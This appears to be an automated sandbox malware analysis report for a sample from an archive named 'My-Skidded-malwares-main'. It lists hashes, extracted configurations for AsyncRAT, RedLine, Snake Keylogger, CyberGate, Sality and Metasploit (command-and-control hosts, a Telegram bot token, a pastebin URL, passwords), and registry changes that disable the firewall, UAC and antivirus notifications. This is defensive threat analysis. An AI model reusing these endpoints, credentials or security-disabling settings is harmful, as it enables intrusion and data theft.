Overview
overview
10Static
static
5My-Skidded...in.zip
windows11-21h2-x64
1My-Skidded...f2.exe
windows11-21h2-x64
8My-Skidded...Us.vbs
windows11-21h2-x64
1My-Skidded...AT.exe
windows11-21h2-x64
10My-Skidded...UN.exe
windows11-21h2-x64
10My-Skidded...no.exe
windows11-21h2-x64
6My-Skidded...!!.zip
windows11-21h2-x64
1My-Skidded...MK.exe
windows11-21h2-x64
My-Skidded...ck.vbs
windows11-21h2-x64
1My-Skidded...it.exe
windows11-21h2-x64
7My-Skidded... 2.bat
windows11-21h2-x64
3My-Skidded...OR.vbs
windows11-21h2-x64
1My-Skidded...ge.exe
windows11-21h2-x64
My-Skidded...ck.exe
windows11-21h2-x64
10My-Skidded...BR.exe
windows11-21h2-x64
My-Skidded...ba.vbs
windows11-21h2-x64
1My-Skidded...ad.exe
windows11-21h2-x64
My-Skidded...BR.exe
windows11-21h2-x64
6My-Skidded...AL.exe
windows11-21h2-x64
6My-Skidded...en.exe
windows11-21h2-x64
6My-Skidded...in.exe
windows11-21h2-x64
6My-Skidded...BR.exe
windows11-21h2-x64
My-Skidded...64.exe
windows11-21h2-x64
My-Skidded...64.exe
windows11-21h2-x64
10My-Skidded...24.exe
windows11-21h2-x64
10My-Skidded...DME.md
windows11-21h2-x64
3My-Skidded....0.bat
windows11-21h2-x64
3My-Skidded...as.exe
windows11-21h2-x64
My-Skidded...ll.bat
windows11-21h2-x64
My-Skidded...ks.exe
windows11-21h2-x64
My-Skidded...ua.exe
windows11-21h2-x64
My-Skidded...kz.bat
windows11-21h2-x64
8Resubmissions
09/03/2025, 01:58
250309-cdv29swybs 1008/03/2025, 06:55
250308-hp35xatjt9 1008/03/2025, 04:53
250308-fh1ebssky5 10Analysis
-
max time kernel
9s -
max time network
54s -
platform
windows11-21h2_x64 -
resource
win11-20250217-en -
resource tags
arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system -
submitted
08/03/2025, 06:55
Behavioral task
behavioral1
Sample
My-Skidded-malwares-main.zip
Resource
win11-20250217-en
Behavioral task
behavioral2
Sample
My-Skidded-malwares-main/6abdd72e82088f5aab90dc9e02f2d9781cea1b3f1c84b3f16df4810956f68ef2.exe
Resource
win11-20250217-en
Behavioral task
behavioral3
Sample
My-Skidded-malwares-main/AmongUs.vbs
Resource
win11-20250217-en
Behavioral task
behavioral4
Sample
My-Skidded-malwares-main/AnaRAT.exe
Resource
win11-20250217-en
Behavioral task
behavioral5
Sample
My-Skidded-malwares-main/CRINGE-DO-NOT-RUN.exe
Resource
win11-20250217-en
Behavioral task
behavioral6
Sample
My-Skidded-malwares-main/Cirno.exe
Resource
win11-20250217-en
Behavioral task
behavioral7
Sample
My-Skidded-malwares-main/Cool Game MAKR 2022!!.zip
Resource
win11-20250217-en
Behavioral task
behavioral8
Sample
My-Skidded-malwares-main/DAMK.exe
Resource
win11-20250218-en
Behavioral task
behavioral9
Sample
My-Skidded-malwares-main/Dell_Fuck.vbs
Resource
win11-20250217-en
Behavioral task
behavioral10
Sample
My-Skidded-malwares-main/Discord Expliot Kit.exe
Resource
win11-20250217-en
Behavioral task
behavioral11
Sample
My-Skidded-malwares-main/ERROR 2.bat
Resource
win11-20250217-en
Behavioral task
behavioral12
Sample
My-Skidded-malwares-main/ERROR.vbs
Resource
win11-20250217-en
Behavioral task
behavioral13
Sample
My-Skidded-malwares-main/Fello_s_Revenge.exe
Resource
win11-20250217-en
Behavioral task
behavioral14
Sample
My-Skidded-malwares-main/Fellos RAT-Pack.exe
Resource
win11-20250217-en
Behavioral task
behavioral15
Sample
My-Skidded-malwares-main/KonataMBR.exe
Resource
win11-20250217-en
Behavioral task
behavioral16
Sample
My-Skidded-malwares-main/KonoSuba.vbs
Resource
win11-20250217-en
Behavioral task
behavioral17
Sample
My-Skidded-malwares-main/MarisaFumoDownload.exe
Resource
win11-20250217-en
Behavioral task
behavioral18
Sample
My-Skidded-malwares-main/MarisaMBR.exe
Resource
win11-20250217-en
Behavioral task
behavioral19
Sample
My-Skidded-malwares-main/Marlon2210FACEREVEAL.exe
Resource
win11-20250217-en
Behavioral task
behavioral20
Sample
My-Skidded-malwares-main/Marlon2210KeyGen.exe
Resource
win11-20250218-en
Behavioral task
behavioral21
Sample
My-Skidded-malwares-main/Megumin.exe
Resource
win11-20250217-en
Behavioral task
behavioral22
Sample
My-Skidded-malwares-main/NazrinMBR.exe
Resource
win11-20250217-en
Behavioral task
behavioral23
Sample
My-Skidded-malwares-main/PCCooker2.0_x64.exe
Resource
win11-20250217-en
Behavioral task
behavioral24
Sample
My-Skidded-malwares-main/PCCooker_x64.exe
Resource
win11-20250217-en
Behavioral task
behavioral25
Sample
My-Skidded-malwares-main/PanKoza2.0 Discord Token Stealer 2024.exe
Resource
win11-20250217-en
Behavioral task
behavioral26
Sample
My-Skidded-malwares-main/README.md
Resource
win11-20250217-en
Behavioral task
behavioral27
Sample
My-Skidded-malwares-main/RaM KilLEr 1.0.bat
Resource
win11-20250217-en
Behavioral task
behavioral28
Sample
My-Skidded-malwares-main/Rias.exe
Resource
win11-20250217-en
Behavioral task
behavioral29
Sample
My-Skidded-malwares-main/Run All.bat
Resource
win11-20250217-en
Behavioral task
behavioral30
Sample
My-Skidded-malwares-main/TouhouHacks.exe
Resource
win11-20250217-en
Behavioral task
behavioral31
Sample
My-Skidded-malwares-main/Trojan.Aqua.exe
Resource
win11-20250218-en
Behavioral task
behavioral32
Sample
My-Skidded-malwares-main/Trojan.Bat.FortniteHackz.bat
Resource
win11-20250217-en
Errors
General
-
Target
My-Skidded-malwares-main/Fello_s_Revenge.exe
-
Size
18.4MB
-
MD5
f8e1d9b436b1d95231ae33b44c6f165c
-
SHA1
bd4a588b9bbcd346fd0e4818da382ca241104d17
-
SHA256
23a6dc4cce379f0d6a85e0b2b09e66d0d0f370e9d610a84aa1810aab605a3976
-
SHA512
963f3ca6370d36d54d9034000e33198e9cfa8d54f7c70cf67e0e9be246a30bbd2db5f927c9dbb5edfebab3e255ece6023d3a2ed72715d1842519a9d2ff45a7f6
-
SSDEEP
393216:XpkQrjxkZI7X/exB5l7qqd6DqhDzeozX5dpYeewDuBnkeKyN:Xrr1kTz7qqAGdzpdFynkeKyN
Malware Config
Extracted
berbew
http://crutop.nu/index.php
http://devx.nm.ru/index.php
http://ros-neftbank.ru/index.php
http://master-x.com/index.php
http://www.redline.ru/index.php
http://cvv.ru/index.php
http://hackers.lv/index.php
http://fethard.biz/index.php
http://crutop.ru/index.php
http://kaspersky.ru/index.php
http://color-bank.ru/index.php
http://adult-empire.com/index.php
http://virus-list.com/index.php
http://trojan.ru/index.php
http://xware.cjb.net/index.htm
http://konfiskat.org/index.htm
http://parex-bank.ru/index.htm
http://fethard.biz/index.htm
http://ldark.nm.ru/index.htm
http://gaz-prom.ru/index.htm
http://promo.ru/index.htm
http://potleaf.chat.ru/index.htm
http://kadet.ru/index.htm
http://cvv.ru/index.htm
http://crutop.nu/index.htm
http://crutop.ru/index.htm
http://kaspersky.ru/index.htm
http://kidos-bank.ru/index.htm
http://kavkaz.ru/index.htm
Extracted
sality
http://89.119.67.154/testo5/
http://kukutrustnet777.info/home.gif
http://kukutrustnet888.info/home.gif
http://kukutrustnet987.info/home.gif
http://www.klkjwre9fqwieluoi.info/
http://kukutrustnet777888.info/
Extracted
asyncrat
0.5.8
Default
127.0.0.1:51848
otherwise-puzzle.gl.at.ply.gg:51848
qsSOINsibBjw
-
delay
3
-
install
true
-
install_file
dwn.exe
-
install_folder
%AppData%
Extracted
xworm
-
install_file
USB.exe
-
pastebin_url
https://pastebin.com/raw/0GcVDftp
Extracted
cybergate
v1.07.5
ahmed
allahouakbar.no-ip.biz:100
U70D500V1OA427
-
enable_keylogger
true
-
enable_message_box
false
-
ftp_directory
./logs/
-
ftp_interval
30
-
injected_process
explorer.exe
-
install_dir
install
-
install_file
Svchost.exe
-
install_flag
true
-
keylogger_enable_ftp
false
-
message_box_caption
Grattis! din dator har nu blivit 2 GHz snabbare :)
-
message_box_title
Windows booster
-
password
webstar
-
regkey_hkcu
HKCU
-
regkey_hklm
HKLM
Extracted
snakekeylogger
https://api.telegram.org/bot7148398804:AAESLKl9fVODMrpM8H4Wkq1Zbm-83PcMLro/sendMessage?chat_id=2135869667
Extracted
redline
185.196.9.26:6302
Extracted
metasploit
windows/download_exec
http://49.235.129.88:80/UaAe
- headers User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MASP)
Signatures
-
Adds autorun key to be loaded by Explorer.exe on startup 2 TTPs 22 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Ikcmbfcj.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" Mahnhhod.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Mblcnj32.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Nknobkje.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" Nknobkje.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" Ikcmbfcj.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" Jnhpoamf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" Kgamnded.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Nbcjnilj.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Iakiia32.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Ihgnkkbd.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Knbbep32.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Kgamnded.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Mahnhhod.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" Mblcnj32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" Iakiia32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" Ihgnkkbd.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Jnhpoamf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" Knbbep32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" Nbcjnilj.exe -
Asyncrat family
-
Berbew family
-
Cybergate family
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral13/files/0x001900000002adb9-431.dat family_xworm behavioral13/memory/952-504-0x0000000000B70000-0x0000000000B86000-memory.dmp family_xworm -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Metasploit family
-
Modifies firewall policy service 3 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral13/memory/2952-699-0x00000000005C0000-0x0000000000612000-memory.dmp family_redline -
Redline family
-
Sality family
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 1 IoCs
resource yara_rule behavioral13/memory/5220-616-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Snakekeylogger family
-
UAC bypass 3 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe -
Windows security bypass 2 TTPs 12 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc\FirewallDisableNotify = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc\FirewallOverride = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc\UpdatesDisableNotify = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc\UacDisableNotify = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc\AntiVirusOverride = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc\AntiVirusDisableNotify = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe -
Xworm family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral13/files/0x001c00000002ad7c-290.dat family_asyncrat -
resource yara_rule behavioral13/files/0x001900000002ad6d-155.dat cryptone -
pid Process 2212 powershell.exe 5824 powershell.exe 4348 powershell.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Morfey.lnk 5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe -
Executes dropped EXE 22 IoCs
pid Process 620 0d4c465488b6f5f760e98a15d77da181419223fdd93915e0fb90646c645b7766.exe 668 5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe 784 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe 2072 90a82defe606e51d2826265a43737130682b738241700782d7e41188475b7fb7.exe 4056 Iakiia32.exe 4300 1955e7fe3c25216101d012eb0b33f527.exe 3396 Ikcmbfcj.exe 440 Morfey.EXE 3884 Ihgnkkbd.exe 1200 a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe 1164 be790b55b11f6502be0c8cf14f2ab4f9e97debe7e07efde26cf24f3927d791db.exe 4240 Jnhpoamf.exe 3172 bec705145d0fedf1bc77946f40328e8c1a00a55f41e55c1892c4fe39bac01fcaN.exe 1452 Knbbep32.exe 3688 c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe 1016 Kgamnded.exe 3904 gold.exe 3244 Mahnhhod.exe 4980 VCREDI~2.EXE 4496 Mblcnj32.exe 1676 Nbcjnilj.exe 2316 Nknobkje.exe -
Loads dropped DLL 3 IoCs
pid Process 1164 be790b55b11f6502be0c8cf14f2ab4f9e97debe7e07efde26cf24f3927d791db.exe 1164 be790b55b11f6502be0c8cf14f2ab4f9e97debe7e07efde26cf24f3927d791db.exe 1164 be790b55b11f6502be0c8cf14f2ab4f9e97debe7e07efde26cf24f3927d791db.exe -
Uses the VBS compiler for execution 1 TTPs
-
Windows security modification 2 TTPs 13 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc\AntiVirusOverride = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc\UpdatesDisableNotify = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc\AntiVirusDisableNotify = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc\FirewallDisableNotify = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc\FirewallOverride = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc\UacDisableNotify = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" Morfey.EXE Set value (str) \REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost.exe = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe\"" bec705145d0fedf1bc77946f40328e8c1a00a55f41e55c1892c4fe39bac01fcaN.exe -
Checks whether UAC is enabled 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 2 pastebin.com 19 pastebin.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 checkip.dyndns.org 32 reallyfreegeoip.org 33 reallyfreegeoip.org -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral13/memory/5620-524-0x0000000000400000-0x00000000004CA000-memory.dmp autoit_exe behavioral13/memory/5620-671-0x0000000000400000-0x00000000004CA000-memory.dmp autoit_exe -
Drops file in System32 directory 34 IoCs
description ioc Process File created C:\Windows\SysWOW64\Nknobkje.exe Nbcjnilj.exe File created C:\Windows\SysWOW64\Kalhafbk.dll Nknobkje.exe File created C:\Windows\SysWOW64\Ddnnfbmk.dll 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe File created C:\Windows\SysWOW64\Ikcmbfcj.exe Iakiia32.exe File opened for modification C:\Windows\SysWOW64\Kgamnded.exe Knbbep32.exe File created C:\Windows\SysWOW64\Mblcnj32.exe Mahnhhod.exe File created C:\Windows\SysWOW64\Ddhmmpnk.dll Mahnhhod.exe File created C:\Windows\SysWOW64\Knbbep32.exe Jnhpoamf.exe File created C:\Windows\SysWOW64\Peehmbji.dll Mblcnj32.exe File created C:\Windows\SysWOW64\Lndigcej.dll Iakiia32.exe File created C:\Windows\SysWOW64\Heolpdjf.dll Ikcmbfcj.exe File created C:\Windows\SysWOW64\Jnhpoamf.exe Ihgnkkbd.exe File created C:\Windows\SysWOW64\Dgcaaddl.dll Nbcjnilj.exe File created C:\Windows\SysWOW64\Ejjlbppk.dll Ihgnkkbd.exe File created C:\Windows\SysWOW64\Ophpeg32.dll Jnhpoamf.exe File created C:\Windows\SysWOW64\Hijjli32.dll Knbbep32.exe File created C:\Windows\SysWOW64\Objpoh32.exe Nknobkje.exe File opened for modification C:\Windows\SysWOW64\Nknobkje.exe Nbcjnilj.exe File opened for modification C:\Windows\SysWOW64\Iakiia32.exe 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe File created C:\Windows\SysWOW64\Kgamnded.exe Knbbep32.exe File created C:\Windows\SysWOW64\Mahnhhod.exe Kgamnded.exe File created C:\Windows\SysWOW64\Cobhcgin.dll Kgamnded.exe File opened for modification C:\Windows\SysWOW64\Nbcjnilj.exe Mblcnj32.exe File opened for modification C:\Windows\SysWOW64\Objpoh32.exe Nknobkje.exe File created C:\Windows\SysWOW64\Iakiia32.exe 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe File opened for modification C:\Windows\SysWOW64\Ikcmbfcj.exe Iakiia32.exe File created C:\Windows\SysWOW64\Ihgnkkbd.exe Ikcmbfcj.exe File opened for modification C:\Windows\SysWOW64\Ihgnkkbd.exe Ikcmbfcj.exe File opened for modification C:\Windows\SysWOW64\Jnhpoamf.exe Ihgnkkbd.exe File opened for modification C:\Windows\SysWOW64\Knbbep32.exe Jnhpoamf.exe File opened for modification C:\Windows\SysWOW64\Mahnhhod.exe Kgamnded.exe File opened for modification C:\Windows\SysWOW64\Mblcnj32.exe Mahnhhod.exe File opened for modification C:\Windows\SysWOW64\Anraabelsens\Hyposternal.udk 90a82defe606e51d2826265a43737130682b738241700782d7e41188475b7fb7.exe File created C:\Windows\SysWOW64\Nbcjnilj.exe Mblcnj32.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3172 set thread context of 2000 3172 bec705145d0fedf1bc77946f40328e8c1a00a55f41e55c1892c4fe39bac01fcaN.exe 107 -
resource yara_rule behavioral13/memory/1200-145-0x0000000002740000-0x00000000037CE000-memory.dmp upx behavioral13/memory/1200-216-0x0000000002740000-0x00000000037CE000-memory.dmp upx behavioral13/memory/1200-157-0x0000000002740000-0x00000000037CE000-memory.dmp upx behavioral13/memory/1200-191-0x0000000002740000-0x00000000037CE000-memory.dmp upx behavioral13/memory/1200-215-0x0000000002740000-0x00000000037CE000-memory.dmp upx behavioral13/memory/1200-217-0x0000000002740000-0x00000000037CE000-memory.dmp upx behavioral13/files/0x001900000002adcf-495.dat upx behavioral13/memory/2000-350-0x0000000011120000-0x0000000011185000-memory.dmp upx behavioral13/memory/1200-339-0x0000000002740000-0x00000000037CE000-memory.dmp upx behavioral13/memory/5620-524-0x0000000000400000-0x00000000004CA000-memory.dmp upx behavioral13/memory/1200-269-0x0000000002740000-0x00000000037CE000-memory.dmp upx behavioral13/memory/1200-271-0x0000000002740000-0x00000000037CE000-memory.dmp upx behavioral13/memory/1200-218-0x0000000002740000-0x00000000037CE000-memory.dmp upx behavioral13/memory/1200-182-0x0000000002740000-0x00000000037CE000-memory.dmp upx behavioral13/memory/1200-164-0x0000000002740000-0x00000000037CE000-memory.dmp upx behavioral13/memory/5620-671-0x0000000000400000-0x00000000004CA000-memory.dmp upx -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SYSTEM.INI a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
pid Process 5184 msiexec.exe -
System Location Discovery: System Language Discovery 1 TTPs 25 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
